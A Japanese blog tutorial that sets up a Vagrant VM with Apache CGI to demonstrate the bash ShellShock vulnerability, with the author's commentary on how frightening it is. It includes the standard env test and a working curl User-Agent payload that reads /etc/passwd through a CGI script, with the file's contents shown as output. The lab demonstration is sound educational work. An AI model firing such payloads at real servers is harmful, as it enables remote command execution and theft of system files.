Edited at

Vagrantですぐに体験するbashのShellShock脆弱性の恐さ

More than 5 years have passed since last update.


ShellShockこわい

bashの脆弱性。ShellShockというのが方々で騒ぎになっています。

説明を読むだけでも背筋が凍るのですが、実際どんなことが起きるかVagrantを使って試してみましょう。


体験してみる


Vagrantの準備

githubからVagrantfileなどをcloneします。


Vagrantfileをclone

git clone https://github.com/ariarijp/vagrant-shellshock.git


cloneが終わったらそのディレクトリーに移動して


Vagrantfileがあるディレクトリーにcd

cd vagrant-shellshock


VMを起動します


VMを起動

vagrant up


もろもろプロビジョニングされますが主にやっていることはApacheのインストールとCGIの有効化です。

VMが起動したら準備完了です。


恐怖のコマンド

まずはVMにSSHログインします。


VMにログイン

vagrant ssh


ログインできたら、以下のコマンドを実行します。このコマンドでは特に問題はありません。


問題が起きないリクエスト

curl http://localhost/cgi-bin/shellshock.cgi



実行結果

ShellShock!


bashに脆弱性があることも確認しておきましょう。

まずはバージョンの確認から。


バージョンの確認

bash --version

GNU bash, version 4.2.24(1)-release (i686-pc-linux-gnu)
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.


影響を受けるバージョン以下となっており、4.2.24は影響を受けるバージョンであることが確認できます。



  • Bash 4.3 Patch 25 およびそれ以前

  • Bash 4.2 Patch 48 およびそれ以前

  • Bash 4.1 Patch 12 およびそれ以前

  • Bash 4.0 Patch 39 およびそれ以前

  • Bash 3.2 Patch 52 およびそれ以前

  • Bash 3.1 Patch 18 およびそれ以前

  • Bash 3.0 Patch 17 およびそれ以前


引用:GNU bash の脆弱性に関する注意喚起

次に脆弱性を確認するためのお決まりのコマンドも確認しておきましょう。


脆弱性の確認

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"



実行結果

vulnerable

this is a test

次に以下のコマンドを実行します。


恐怖のコマンド

curl -A "() { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd" http://localhost/cgi-bin/shellshock.cgi


実行結果はこんな感じです。これは。。


実行結果

curl -A "() { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd" http://localhost/cgi-bin/shellshock.cgi

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
ntp:x:103:108::/home/ntp:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vagrant:x:1000:1000:vagrant,,,:/home/vagrant:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
statd:x:105:65534::/var/lib/nfs:/bin/false

ちなみにshellshock.cgiの中身はこんな感じです。単純にヘッダーと本文をechoしているだけなのですが。。


shellshock.cgi

#!/bin/bash

echo "Content-type: text/plain"
echo
echo
"ShellShock!"


まとめ

使用しているbashのバージョンだけでなく、CGIの使用有無などによっても影響度は異なります。

JPCERTなどの信用できる情報を参考に対策を行いましょう。

ShellShockこわいです。


参考サイト